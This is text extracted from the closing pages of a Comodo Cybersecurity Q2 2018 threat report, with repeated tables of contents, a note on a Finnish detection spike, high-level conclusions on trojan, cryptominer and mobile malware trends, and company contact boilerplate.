- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-